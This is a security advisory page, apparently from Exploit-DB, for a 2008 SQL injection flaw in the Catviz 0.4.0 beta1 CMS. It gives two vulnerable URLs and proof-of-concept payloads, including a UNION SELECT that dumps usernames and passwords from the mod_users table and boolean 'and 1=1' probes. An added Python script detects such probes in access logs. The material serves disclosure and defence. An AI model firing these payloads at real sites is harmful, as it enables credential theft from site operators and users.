Vendor: Catviz
By: h0yt3r
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Catviz
Affected Version From: 0.4.0 beta1
Affected Version To: 0.4.0 beta1
Patch Exists: NO
Related CWE: N/A
CPE: a:catviz:catviz:0.4.0_beta1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Catviz 0.4.0 beta1 SQL Injection Vulnerability

Catviz 0.4.0 beta1 uses several variables in SQL queries without verifying them correctly. An attacker can easily obtain sensitive information from the database by injecting unexpected SQL queries.

The vulnerable URLs are:

http://[target]/[path]/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=[SQL]
http://[target]/[path]/index.php?webpages_form=webpage_multi_edit&webpage=[SQL]

The PoC is:

index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users/*
index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1
index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0

Mitigation:

The user should ensure that all input is properly validated and sanitized before being used in a SQL query.
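
With no patch listed, one way to apply that validation rule and to review web-server logs for requests that break it is sketched below. This is an added example, not code from the advisory or from Catviz. It assumes that `foreign_key_value` and `webpage` are meant to hold numeric ids (the PoC uses 10 and 26) and that logs are in combined access-log format; the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters named in the advisory. Assumption: both carry numeric record ids
# (the PoC uses 10 and 26), so any value that is not plain digits is out of spec.
NUMERIC_PARAMS = ("foreign_key_value", "webpage")
DIGITS = re.compile(r"[0-9]{1,10}")
# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.*) HTTP/[0-9.]+"')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jun/2008:10:00:00 +0000] "GET /index.php?module=news'
    '&news_op=form&form_name=article&form_action=show&foreign_key_value=10'
    ' HTTP/1.1" 200 5120',
    '198.51.100.7 - - [30/Jun/2008:10:00:05 +0000] "GET /index.php'
    '?webpages_form=webpage_multi_edit&webpage=26%20and%201=1 HTTP/1.1" 200 4096',
    '198.51.100.7 - - [30/Jun/2008:10:00:06 +0000] "GET /index.php'
    '?webpages_form=webpage_multi_edit&webpage=26%20and%201=0 HTTP/1.1" 200 812',
]


def bad_params(target):
    """Return [(name, value)] for advisory parameters whose value is not an integer."""
    # parse_qsl percent-decodes and maps '+' to space, so encoded and literal
    # spellings of the same value are judged alike.
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return [(k, v) for k, v in pairs
            if k in NUMERIC_PARAMS and not DIGITS.fullmatch(v)]


def scan(log_lines):
    """Return [(client, name, value)] for each out-of-spec parameter in the log."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if m:
            client = line.split(" ", 1)[0]
            hits += [(client, k, v) for k, v in bad_params(m.group("target"))]
    return hits


if __name__ == "__main__":
    for client, name, value in scan(SAMPLE_LOG):
        print(f"{client}: {name}={value!r} is not an integer")
```

The digit-only rule in `bad_params` is the same check the application would need to enforce on these two parameters before the value reaches a query, ideally together with parameterized queries.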

Exploit-DB raw data:

######################
#
#Catviz 0.4.0 beta1 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: n/a
#
#Homepage: catviz.sourceforge.net
#
##
###
##
#
#This CMS suffers from some not correctly verified variables which are used in SQL queries.
#An Attacker can easily get sensitive information from the database by injecting unexpected SQL queries.
#
#SQL Injection:
#http://[target]/[path]/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=[SQL]
#http://[target]/[path]/index.php?webpages_form=webpage_multi_edit&webpage=[SQL]
#
#PoC:
#index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users/*
#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1
#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0
#
#
#You get "Go away you nasty intruder wannabe." when you do a wrong login...
#
#
#######################
#
#Greetz to thund3r, b!zZ!t, haZl0oh, WhiT€ $h@Dow, $h4d0wl33t, codeblu815, ramon, Free-Hack and Sys-Flaw and h4ck-y0u.
#
#
#######################
####################### 

# milw0rm.com [2008-06-30]